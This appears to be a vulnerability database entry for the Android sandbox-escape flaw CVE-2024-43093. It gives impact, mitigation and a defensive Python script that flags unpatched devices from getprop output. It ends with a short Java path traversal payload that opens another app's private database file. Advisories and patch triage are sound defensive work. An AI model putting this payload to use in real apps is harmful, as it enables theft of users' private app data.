CVE-2024-43093 | Android | Sandbox | High
Framework path traversal sandbox escape
- affected: 12-15
- disclosed: 2024-11-04
- discovered: 2024-09-20
- patched: November 2024 ASB
- author: Google AOSP
- platform: Android
## description
Path traversal in the Android framework allows an attacker app to access files outside its sandbox in protected directories such as Android/data and Android/obb.
## impact
Cross-app data exfiltration. Active exploitation reported by Google.
## mitigation
Apply November 2024 Android security patch level.
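
A triage check for the mitigation above, as an added example that is not part of the original entry: it reads `getprop` output and flags devices on an affected release (12-15) whose security patch level predates November 2024. The sample fleet and device names are constructed, and treating any patch level dated 2024-11 or later as fixed is an assumption, since the entry does not say which patch-level string carries the fix.

```python
import re

AFFECTED = range(12, 16)   # entry: affected 12-15
FIXED_FROM = (2024, 11)    # entry: patched in the November 2024 ASB (assumed: any 2024-11+ level)

# `getprop` prints one property per line as "[key]: [value]"
PROP_RE = re.compile(r"^\[(?P<key>[^\]]+)\]: \[(?P<val>[^\]]*)\]$")

def parse_getprop(dump):
    """Parse getprop output into a {key: value} dict, ignoring unrelated lines."""
    props = {}
    for line in dump.splitlines():
        m = PROP_RE.match(line.strip())
        if m:
            props[m["key"]] = m["val"]
    return props

def triage(props):
    """Return 'not-listed', 'patched', 'vulnerable' or 'unknown' for one device."""
    rel = re.match(r"\d+", props.get("ro.build.version.release", ""))
    spl = re.fullmatch(r"(\d{4})-(\d{2})-(\d{2})",
                       props.get("ro.build.version.security_patch", ""))
    if not rel:
        return "unknown"       # codename or missing release string
    if int(rel.group()) not in AFFECTED:
        return "not-listed"    # release outside the range the entry lists
    if not spl:
        return "unknown"       # affected release, unreadable patch level: investigate
    return "patched" if (int(spl[1]), int(spl[2])) >= FIXED_FROM else "vulnerable"

# Constructed getprop excerpts, not captured from real devices.
SAMPLE_FLEET = {
    "dev-a": "[ro.build.version.release]: [14]\n[ro.build.version.security_patch]: [2024-10-05]",
    "dev-b": "[ro.build.version.release]: [13]\n[ro.build.version.security_patch]: [2024-11-01]",
    "dev-c": "[ro.build.version.release]: [11]\n[ro.build.version.security_patch]: [2023-02-05]",
    "dev-d": "[ro.build.version.release]: [15]\n[ro.build.version.security_patch]: []",
}

def triage_fleet(fleet):
    """Map each device name to its triage verdict."""
    return {name: triage(parse_getprop(dump)) for name, dump in fleet.items()}

if __name__ == "__main__":
    for name, verdict in triage_fleet(SAMPLE_FLEET).items():
        print(f"{name}: {verdict}")
```

Devices reported as `unknown` need a manual look rather than being counted as patched.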
## proof of concept
```java
// Path traversal payload
File f = new File(ctx.getExternalFilesDir(null),
        "../../../Android/data/com.victim/files/secret.db");
FileInputStream in = new FileInputStream(f);
```